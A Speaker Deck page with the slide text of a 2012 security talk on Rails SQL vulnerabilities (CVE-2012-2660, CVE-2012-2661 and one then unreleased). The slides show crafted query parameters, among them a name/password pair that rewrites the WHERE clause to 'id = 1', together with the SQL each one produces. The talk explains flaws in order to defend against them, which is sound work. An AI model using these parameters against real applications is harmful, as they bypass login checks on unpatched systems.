Lock in $30 Savings on PRO—Offer Ends Soon! ⏳
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
70
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
160
The Evolution of Rails Security
presidentbeef
1
830
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
140
Practical Static Analysis for Continuous Application Security
presidentbeef
0
210
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
450
Continuous Security with Practical Static Analysis
presidentbeef
1
320
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
250
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
250
Other Decks in Programming
See All in Programming
WebRTC と Rust と 8K 60fps
tnoho
2
1.9k
AIエンジニアリングのご紹介 / Introduction to AI Engineering
rkaga
2
1.1k
Microservices Platforms: When Team Topologies Meets Microservices Patterns
cer
PRO
1
920
CSC305 Lecture 17
javiergs
PRO
0
270
俺流レスポンシブコーディング 2025
tak_dcxi
13
7.7k
tsgolintはいかにしてtypescript-goの非公開APIを呼び出しているのか
syumai
5
1.2k
ローターアクトEクラブ アメリカンナイト:川端 柚菜 氏(Japan O.K. ローターアクトEクラブ 会長):2720 Japan O.K. ロータリーEクラブ2025年12月1日卓話
2720japanoke
0
450
関数の挙動書き換える
takatofukui
4
770
WebRTC、 綺麗に見るか滑らかに見るか
sublimer
1
140
20 years of Symfony, what's next?
fabpot
2
310
TypeScript 5.9 で使えるようになった import defer でパフォーマンス最適化を実現する
bicstone
1
1k
AI時代もSEOを頑張っている話
shirahama_x
0
230
Featured
See All Featured
Agile that works and the tools we love
rasmusluckow
331
21k
Building Better People: How to give real-time feedback that sticks.
wjessup
370
20k
The Illustrated Children's Guide to Kubernetes
chrisshort
51
51k
Art, The Web, and Tiny UX
lynnandtonic
303
21k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
359
30k
The Straight Up "How To Draw Better" Workshop
denniskardys
239
140k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
21
1.3k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
49
3.2k
A Modern Web Designer's Workflow
chriscoyier
697
190k
Reflections from 52 weeks, 52 projects
jeffersonlam
355
21k
[RailsConf 2023] Rails as a piece of cake
palkan
58
6.1k
Learning to Love Humans: Emotional Interface Design
aarron
274
41k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
tnoho
rkaga
cer
javiergs
.jpg){kind=avatar}
tak_dcxi
syumai
2720japanoke
takatofukui
sublimer
fabpot
bicstone
shirahama_x
rasmusluckow
wjessup
chrisshort
lynnandtonic
bermonpainter
denniskardys
sergeychernyshev
tammyeverts
chriscoyier
jeffersonlam
palkan
aarron
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
